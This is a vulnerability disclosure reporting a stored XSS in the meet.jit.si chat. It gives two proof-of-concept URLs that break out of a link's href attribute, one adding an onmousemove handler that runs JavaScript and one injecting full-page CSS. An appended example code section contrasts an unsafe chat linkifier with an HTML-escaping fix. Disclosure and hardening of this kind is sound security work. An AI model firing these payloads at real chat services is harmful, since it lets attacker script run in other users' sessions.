[meet.jit.si] Stored XSS on meet.jit.si chat

Hello,

I found a stored Cross Site Scripting (XSS) vulnerability on Jitsi-Meet’s chat.

This URL will break the HTML tag.

http://foo@google.com

After fuzzing with this issue, here’s the PoC that will execute the JavaScript or inject CSS code:

# Execute javascript
http://foo@www.google.com/x"onmousemove=alert`xss`;////

# Inject CSS code
http://foo@www.google.com/x"style=position:absolute;top:0;left:0;width:100%;height:100%;background-color:red;////

Regards,

k1tten
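
An added example, not part of the original post and not Jitsi Meet's code: a hypothetical chat linkifier showing how an unescaped double quote in a URL ends the `href` attribute, which is the behaviour the PoC relies on, beside a version that HTML-escapes all user text. The function names are illustrative, and the page does not state the root cause in Jitsi Meet's own code.

```javascript
// Added illustration: a hypothetical chat linkifier, NOT Jitsi Meet's code.
const URL_RE = /https?:\/\/\S+/g;

// Vulnerable pattern: the matched URL is concatenated into href unescaped,
// so a double quote inside the URL closes the attribute early.
function linkifyUnsafe(message) {
  return message.replace(URL_RE, (u) => '<a href="' + u + '">' + u + '</a>');
}

const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Only http(s) URLs that the WHATWG URL parser accepts become links.
function isHttpUrl(candidate) {
  try {
    return ['http:', 'https:'].includes(new URL(candidate).protocol);
  } catch (e) {
    return false;
  }
}

// Hardened: every piece of user text, URL included, is HTML-escaped before
// it is placed in markup, so it can never leave the href value.
function linkifySafe(message) {
  let out = '';
  let last = 0;
  for (const m of message.matchAll(URL_RE)) {
    const u = escapeHtml(m[0]);
    out += escapeHtml(message.slice(last, m.index));
    out += isHttpUrl(m[0]) ? '<a href="' + u + '" rel="noopener noreferrer">' + u + '</a>' : u;
    last = m.index + m[0].length;
  }
  return out + escapeHtml(message.slice(last));
}

// Simplified tokenizer (demo only): attribute names on the first <a> tag.
function anchorAttributes(html) {
  const tag = /<a\s([^>]*)>/.exec(html);
  const attr = /([^\s"'=<>\/]+)(?:=("[^"]*"|'[^']*'|[^\s>]*))?/g;
  return tag ? [...tag[1].matchAll(attr)].map((m) => m[1]) : [];
}

// The first PoC string from the post, used as the chat message.
const MESSAGE = 'http://foo@www.google.com/x"onmousemove=alert`xss`;////';
console.log(anchorAttributes(linkifyUnsafe(MESSAGE))); // unsafe: extra attribute
console.log(anchorAttributes(linkifySafe(MESSAGE)));   // safe: href and rel only
```

Building the anchor with DOM APIs (`createElement`, `setAttribute`, `textContent`) instead of string concatenation removes the need for manual escaping altogether.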

